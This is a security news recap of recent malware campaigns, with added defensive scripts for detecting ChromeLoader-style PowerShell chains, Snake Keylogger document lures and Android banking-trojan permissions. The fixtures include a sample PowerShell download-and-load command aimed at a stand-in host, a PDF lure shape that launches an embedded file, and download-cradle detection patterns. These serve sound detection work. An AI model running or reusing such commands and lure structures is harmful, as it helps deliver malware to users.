The past few weeks have seen a resurgence of malware campaigns, with familiar and new names in the industry reports: Flubot, ERMAC 2.0, ChromeLoader and Snake Keylogger.
Several security alerts about attacks on users have been issued in the last few hours. The usual defences still apply: do not click links in unsolicited messages, keep an up-to-date antivirus on every device, and do not download cracked programs or apps from stores other than the official ones.
The first threat in this short recap is the ERMAC 2.0 malware which, derived from the Cerberus code base, is currently rented out on the dark web for $5,000 a month. The campaign, reported by ESET and Bleeping Computer, shows that the trojan now targets 467 applications. It is distributed outside the Play Store: one lure is Bolt Food, a legitimate food delivery app, offered as a trojanised copy on a site that closely imitates the original and is advertised through social media posts, phishing e-mails and malvertising.
Once installed, the malware asks to be granted the Accessibility Services permission. From that moment it can read and write device storage, read the address book, record audio, read and send SMS messages and, above all, overlay fake login forms on legitimate apps and sites to capture credentials for home banking, asset management services and major cryptocurrency wallets. The stolen data is then sent to a remote command and control server.
Another threat spreading this month, although active since at least February, was reported by Red Canary: the ChromeLoader malware, which hijacks browsers on both PC and Mac. Advertising campaigns on Twitter direct users to torrent listings or to compromised sites that promise cracks or key generators for games and commercial software. On Windows the download is an ISO image; once mounted as a virtual drive, the executable inside it runs PowerShell, which decodes its instructions, downloads a remote archive and installs it locally as a Chrome extension. The extension then redirects the victim to fake dating sites, sweepstakes, surveys and adult games, from which the criminals earn affiliate revenue. On macOS the download is a DMG instead, and a bash script downloads and unpacks into a temporary folder the extension that alters Safari's behaviour.
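The Windows chain above leaves a recognisable trace in process-creation telemetry: an installer run from a freshly mounted drive spawns PowerShell with an encoded command that contains a download cradle and a Chrome `--load-extension` switch. The script below is an added example written for this article, not Red Canary's or any vendor's detection logic. The indicator set (download cradle, `--load-extension`, scheduled-task creation), the Sysmon-style event layout, the stand-in installer script, the `example.invalid` URL and the file names are all assumptions constructed for the demonstration.

```python
import base64
import re

# Indicators assumed for this example (not taken from the original article):
# a PowerShell download cradle, Chrome's --load-extension switch and
# scheduled-task creation are the parts of a ChromeLoader-style chain that
# are visible in process-creation events.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
LOAD_EXTENSION = re.compile(r"--load-extension", re.I)
SCHED_TASK = re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I)


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> list:
    """Return the indicator names matched by one process-creation event."""
    cmd = event.get("CommandLine", "")
    hits = []
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded_command")
        text = cmd + "\n" + decoded  # inspect the decoded script as well
    if DOWNLOAD_CRADLE.search(text):
        hits.append("download_cradle")
    if LOAD_EXTENSION.search(text):
        hits.append("chrome_load_extension")
    if SCHED_TASK.search(text):
        hits.append("scheduled_task")
    return hits


def triage(events: list) -> list:
    """Flag events that both download something and load or persist an extension."""
    flagged = []
    for ev in events:
        hits = score_event(ev)
        if "download_cradle" in hits and ("chrome_load_extension" in hits or "scheduled_task" in hits):
            flagged.append((ev["ParentImage"], hits))
    return flagged


# Constructed sample events in Sysmon Event ID 1 style (not real telemetry).
# The stand-in installer script mimics the behaviour described in the text;
# the URL and file names are invented.
INSTALLER_SCRIPT = (
    "$u='http://cdn.example.invalid/ext.zip';"
    "(New-Object Net.WebClient).DownloadFile($u,\"$env:TEMP\\ext.zip\");"
    "Expand-Archive \"$env:TEMP\\ext.zip\" \"$env:APPDATA\\ext\" -Force;"
    "Start-Process chrome.exe \"--load-extension=$env:APPDATA\\ext\""
)
EVENTS = [
    {   # ISO mounted as D:, its installer spawns PowerShell with an encoded command
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"D:\CrackInstaller.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(INSTALLER_SCRIPT),
    },
    {   # admin script: no encoding, no download
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    },
    {   # encoded but harmless: encoding alone is not enough to flag
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -enc " + encode_ps("Get-Service | Where-Object Status -eq Running"),
    },
]

if __name__ == "__main__":
    for parent, hits in triage(EVENTS):
        print(f"FLAGGED parent={parent} indicators={hits}")
```

The decode step matters: without it a rule that only matches on the visible command line never sees the cradle or the `--load-extension` switch. Requiring two indicators rather than one keeps ordinary encoded admin scripts out of the alert queue.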
HP Wolf Security, the division Hewlett Packard created during the pandemic to protect remote workers, instead reports on the Snake Keylogger info stealer. It spreads through e-mail attachments in PDF format that pose as payment receipts. When the file is opened, the default PDF reader (e.g. Acrobat Reader) prompts the user to open an embedded .docx file whose name contains the words "has been verified"; lulled into a false sense of security, the user disables Protected View. A macro in the document then fetches an RTF file which, by exploiting CVE-2017-11882 in Microsoft Equation Editor, runs shellcode that downloads and launches fresh.exe, the Snake Keylogger itself. The keylogger steals information such as Wi-Fi network credentials and the logins saved in browsers and e-mail clients.
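Each stage of that chain is a file with a structural tell: a PDF carrying an embedded file and an open action, a .docx carrying a VBA project, and an RTF embedding an `Equation.3` OLE object. The scanner below is an added example written for this article, not HP Wolf Security's analysis tooling. The indicator strings (the PDF dictionary keys, the `Equation.3` class name in plain and hex form, the `\objupdate` control word, `vbaProject.bin`) are documented format features chosen for this example, and the three sample files are constructed stand-ins that only reproduce the shape of each stage, not any real payload.

```python
import io
import re
import zipfile

# Indicators assumed for this example (documented PDF, RTF/OLE and OOXML
# structures, not details from the original article).
PDF_INDICATORS = {
    "pdf_embedded_file": re.compile(rb"/EmbeddedFile\b"),
    "pdf_openaction": re.compile(rb"/OpenAction\b"),
    "pdf_javascript": re.compile(rb"/JavaScript\b|/JS\b"),
    "pdf_launch": re.compile(rb"/Launch\b"),
}
# An Equation Editor embed is an OLE object whose class name is "Equation.3";
# inside \objdata the same name appears hex-encoded.
EQUATION_ASCII = re.compile(rb"\\objclass\s+Equation\.3", re.I)
EQUATION_HEX = re.compile(rb"4571756174696f6e2e33", re.I)  # hex("Equation.3")
OBJUPDATE = re.compile(rb"\\objupdate")
WEAK = {"pdf_openaction"}  # common in clean PDFs; only escalates with other hits


def sniff(data: bytes) -> str:
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"{\\rt"):
        return "rtf"
    if data.startswith(b"PK\x03\x04"):
        return "ooxml"
    return "unknown"


def scan_pdf(data: bytes) -> list:
    return [name for name, rx in PDF_INDICATORS.items() if rx.search(data)]


def scan_rtf(data: bytes) -> list:
    hits = []
    if EQUATION_ASCII.search(data) or EQUATION_HEX.search(data):
        hits.append("rtf_equation_editor_object")
    if OBJUPDATE.search(data):
        hits.append("rtf_objupdate")  # forces the object to load when the file opens
    return hits


def scan_ooxml(data: bytes) -> list:
    try:
        names = zipfile.ZipFile(io.BytesIO(data)).namelist()
    except zipfile.BadZipFile:
        return ["ooxml_corrupt_zip"]
    hits = []
    if any(n.lower().endswith("vbaproject.bin") for n in names):
        hits.append("ooxml_vba_macro")
    if any(n.lower().startswith("word/embeddings/") for n in names):
        hits.append("ooxml_embedded_object")
    return hits


SCANNERS = {"pdf": scan_pdf, "rtf": scan_rtf, "ooxml": scan_ooxml}


def classify(data: bytes) -> dict:
    kind = sniff(data)
    hits = SCANNERS.get(kind, lambda d: [])(data)
    strong = [h for h in hits if h not in WEAK]
    verdict = "suspicious" if strong else ("review" if hits else "clean")
    return {"type": kind, "indicators": hits, "verdict": verdict}


# --- Constructed samples (shape only, no working payload) ---
PDF_LURE = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R
  /Names << /EmbeddedFiles << /Names [(Receipt_has_been_verified.docx) 4 0 R] >> >>
  /OpenAction 5 0 R >> endobj
4 0 obj << /Type /Filespec /F (Receipt_has_been_verified.docx) /EF << /F 6 0 R >> >> endobj
6 0 obj << /Type /EmbeddedFile /Length 0 >> stream
endstream endobj
5 0 obj << /S /JavaScript /JS (this.exportDataObject({cName:'Receipt_has_been_verified.docx', nLaunch:2});) >> endobj
%%EOF
"""
CLEAN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"
# OLE1 header (version, format, class-name length) followed by "Equation.3\0" in hex
RTF_EQUATION_SHAPE = (rb"{\rtf1{\object\objemb\objupdate{\*\objclass Equation.3}"
                      rb"{\*\objdata 01050000020000000b0000004571756174696f6e2e3300}}}")


def build_docx(with_macro: bool) -> bytes:
    """Minimal in-memory .docx, optionally with a stand-in VBA project part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stand-in macro container")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in [("pdf lure", PDF_LURE), ("rtf", RTF_EQUATION_SHAPE), ("docx", build_docx(True))]:
        print(label, classify(blob))
```

Run on a mail gateway this catches the lure before the user is ever asked to disable Protected View; the RTF check is worth keeping even on patched fleets, because a document that still ships an `Equation.3` object in 2022 has no legitimate reason to.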
From the Romanian security firm Bitdefender comes the report of a new distribution campaign for the Flubot malware. Here the malware spreads by SMS with links inviting the recipient to listen to a voice message. The link leads to a prompt to install a supposed Android app for managing voicemail which, besides requesting Accessibility Services to take full control of the device, also asks for access to the address book (which the user grants, finding it normal for a messaging app). Once the permissions are granted the malware goes to work: it spreads by SMS to the victim's contacts while stealing their personal and banking information and credit card details. On iOS it behaves differently, sending the user to sites that sign them up to paid subscriptions or try to steal their credentials in other ways.
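Both ERMAC 2.0 and Flubot, as described above, rely on the same permission set: an accessibility service for control of the device, plus SMS, contacts, overlay and audio access. A quick manifest triage makes that combination visible before an app is installed. The script below is an added example written for this article and is not Bitdefender's, ESET's or any vendor's tooling. It assumes the manifest has already been decoded to text (an APK stores it as binary XML, so run it through apktool or a similar decoder first); the capability grouping, the scoring rule and the two sample manifests, including the package names, are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
A_PERMISSION = "{%s}permission" % ANDROID_NS
ACCESSIBILITY_BIND = "android.permission.BIND_ACCESSIBILITY_SERVICE"

# Capability groups matching the ERMAC/Flubot descriptions. The grouping and
# the verdict rule are this example's own heuristic, not a published rule.
CAPABILITIES = {
    "sms": {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
            "android.permission.SEND_SMS"},
    "overlay": {"android.permission.SYSTEM_ALERT_WINDOW"},
    "contacts": {"android.permission.READ_CONTACTS"},
    "audio_capture": {"android.permission.RECORD_AUDIO"},
    "sideload": {"android.permission.REQUEST_INSTALL_PACKAGES"},
}


def parse_manifest(xml_text: str) -> dict:
    """Collect requested permissions and whether an accessibility service is declared."""
    root = ET.fromstring(xml_text)
    perms = {el.get(A_NAME) for el in root.iter("uses-permission")}
    perms.discard(None)
    # Accessibility is not a <uses-permission>: the app declares a <service>
    # protected by BIND_ACCESSIBILITY_SERVICE and the user enables it.
    a11y = any(el.get(A_PERMISSION) == ACCESSIBILITY_BIND for el in root.iter("service"))
    return {"package": root.get("package"), "permissions": perms, "accessibility_service": a11y}


def assess(info: dict) -> dict:
    caps = sorted(c for c, names in CAPABILITIES.items() if info["permissions"] & names)
    if info["accessibility_service"]:
        caps.insert(0, "accessibility_service")
    if info["accessibility_service"] and ({"sms", "overlay"} & set(caps)):
        verdict = "suspicious"   # device control plus SMS spread or overlay: banker pattern
    elif len(caps) >= 3:
        verdict = "review"
    else:
        verdict = "low"
    return {"package": info["package"], "capabilities": caps, "verdict": verdict}


# Constructed manifests (decoded text form); package names are invented.
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.voicemsg">
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <application>
    <service android:name=".A11yService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>
"""
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.smsclient">
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application/>
</manifest>
"""

if __name__ == "__main__":
    for m in (SUSPECT_MANIFEST, BENIGN_MANIFEST):
        print(assess(parse_manifest(m)))
```

The discriminator is the accessibility service, not the SMS permissions on their own: a real SMS client legitimately needs contacts and SMS access, while a "voicemail" app that also wants to drive the UI through accessibility and draw over other apps is asking for exactly what an overlay banker needs.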